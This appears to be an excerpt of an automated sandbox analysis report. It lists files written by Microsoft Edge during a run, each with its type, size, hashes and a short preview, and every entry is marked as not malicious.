                                                                                                                                                                                                                                                                              MD5:F263B751997282FC006CE4B5999E237F
                                                                                                                                                                                                                                                                              SHA1:EC62C3CFEA42F51E2BF75590208DB932B0E81343
                                                                                                                                                                                                                                                                              SHA-256:30AABDB5ED5C0C5C6E370DB38083F5EF40A6984F72793B3E32477B9A391BC2D0
                                                                                                                                                                                                                                                                              SHA-512:27686BBFE1EB90D8C02926C9317896263DDF2A057822CF360247D2A9E6BF057E67D63ACBC4BA245D30DEF66092BF5A23231CE0E3790F6CFCDE8C9652A0B05F07
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.4462035509527405
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:m/EUUaUwRkceegT08wW/v1qR5UGWESaH:Okc2T9qO4
                                                                                                                                                                                                                                                                              MD5:9791B53FF87C36C605CA46B10E23F376
                                                                                                                                                                                                                                                                              SHA1:C89FA8E56C650E2EE6C00BB73453CB836FC25EF4
                                                                                                                                                                                                                                                                              SHA-256:261B0B339788EC94DD47BBE6524BF5BF05D3DF56ABCCDD2CD7C31F38E83E4180
                                                                                                                                                                                                                                                                              SHA-512:D4CA66DCEAE87A59C8D34BA79C3D52D163376E1BB3390F4DF8E81AD07A0299A78D9110912216317B53A1141553246C532CA5EF1906C55C97C8F4CFF333CE0CC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.04727271171294309
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:wRQ0m5tmFnOAUpYIJPi6VBKP7+HfgHXl/ILMkYTwgh81MNH+zRQcD/OxRvzn8y0d:SQ0Ute2N4hJhHgVf2vz08T2RGOD
                                                                                                                                                                                                                                                                              MD5:D15C1F7B6EECB63EAA5DC34EF208C94F
                                                                                                                                                                                                                                                                              SHA1:888193E5C8D7B45873B337FA969B9E455EBF1F4C
                                                                                                                                                                                                                                                                              SHA-256:738551FAC012C36128BDD5818E065D3F86FBAAE2C64B7B7B88E376B510109721
                                                                                                                                                                                                                                                                              SHA-512:19E19CBE8407783BBCC77D494FACCCF239E7A9735714A5CAE33CF924B1CBE56A8BB1FB0B169C1D1495B880D19D30C90D4B7E4AF2B94262F900843C25E37CC8BD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                              Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                              MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                              SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                              SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                              SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                              Entropy (8bit):5.567332610294245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (17550), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):17554
                                                                                                                                                                                                                                                                              Entropy (8bit):5.49199255450566
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):315
                                                                                                                                                                                                                                                                              Entropy (8bit):5.20287605502085
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.184 17e0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/20-02:42:17.219 17e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                              Size (bytes):1696115
                                                                                                                                                                                                                                                                              Entropy (8bit):5.040610599315513
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24576:k1f76gGkISshcFdmcOAoPENUpifYP+MbI2T:k1fgAmmE
                                                                                                                                                                                                                                                                              MD5:40C73356F840BD97A9415FF3F3E47CC1
                                                                                                                                                                                                                                                                              SHA1:23AF5AC798250AA10710710148115A0C1D7E8BF6
                                                                                                                                                                                                                                                                              SHA-256:A90AE9B167692264443726BF3C42E2281062F2373078206465AA6AE273E88692
                                                                                                                                                                                                                                                                              SHA-512:49C2834760E9C02F3AC4CB10F76738A1100FBF22506143C9F377A466949C57F3C5DF4DA24796D95EE6899A94590A4D213EC4A31293CF07005AAEBD71D4B529CC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0662506129907445
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfx/tYVq2PcNwi23oH+Tcwt9Eh1tIFUt8IXfx/jIgZmw+IXfx/XYIkwOcNwi23A:R/tAvLZYeb9Eh16FUt86/jx/+6/X754G
                                                                                                                                                                                                                                                                              MD5:E622219A199FB8B7854773D37B74EF44
                                                                                                                                                                                                                                                                              SHA1:DB84BFBCB3E3F9618DFAE030E27A5DDDD6F40DB7
                                                                                                                                                                                                                                                                              SHA-256:884C58B2AF4AE9B15406DE5932801606763BA6D66F5F6818332056775D9504FD
                                                                                                                                                                                                                                                                              SHA-512:A79752C2A861D3B5CA522AB57FA70F21788CDFCC10706D78ADB560DFF0B3BB14B2FE4A2B73819E965CD5346A4BB9971C22811D9EFC1AF39009B98E1D035F5CAB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:17.133 1020 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/20-02:42:17.135 1020 Recovering log #3.2024/12/20-02:42:17.139 1020 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                              Entropy (8bit):0.4622876779283167
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuTn:TouQq3qh7z3bY2LNW9WMcUvBuz
                                                                                                                                                                                                                                                                              MD5:30F0ECFD8EA17255267F2E0775AC40EB
                                                                                                                                                                                                                                                                              SHA1:A0D6C6FA2FE52BB49BAF72A4787691FA79D5BF58
                                                                                                                                                                                                                                                                              SHA-256:AEF3760A4D0CB187B4E9876F0A7EDFA4B4F1E0949B58A21A927E55DE17FF74B7
                                                                                                                                                                                                                                                                              SHA-512:180741BDF405FE958B9A85F807C1456E4B40B02BF8FAB03F35CD97E96EFF5BDB27C3521E34D296A6AD531D9200539E45BA51BC19F26F2E7205B74EB5C82B725B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):351
                                                                                                                                                                                                                                                                              Entropy (8bit):5.21621799189404
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxY7q2PcNwi23oH+TcwtnG2tMsIFUt8IXfxYeZmw+IXfxpcLDkwOcNwi23oH+V:RY7vLZYebn9GFUt86Ye/+6pM54ZYebnB
                                                                                                                                                                                                                                                                              MD5:F46127CF382EF69622411CDDCD24281E
                                                                                                                                                                                                                                                                              SHA1:326A81E11F619A212FA341A4AC619FC09A2B5F41
                                                                                                                                                                                                                                                                              SHA-256:7AB5E219805457E2FED11313A8A11BF12B3FEA05E8ED8B7A54FF39AE3612DC97
                                                                                                                                                                                                                                                                              SHA-512:4729CCB514DF08FAB2926AF82C7558682C05866BD8201413D17570E199842BF017C8BDD69101EEF19D26570C347EC79711F2333C7B29358A5DE27D2451160169
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.736 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-02:42:12.736 894 Recovering log #3.2024/12/20-02:42:12.737 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):351
                                                                                                                                                                                                                                                                              Entropy (8bit):5.21621799189404
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:12.736 894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/20-02:42:12.736 894 Recovering log #3.2024/12/20-02:42:12.737 894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.6133706919549803
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3...
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):375520
                                                                                                                                                                                                                                                                              Entropy (8bit):5.354106791217515
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
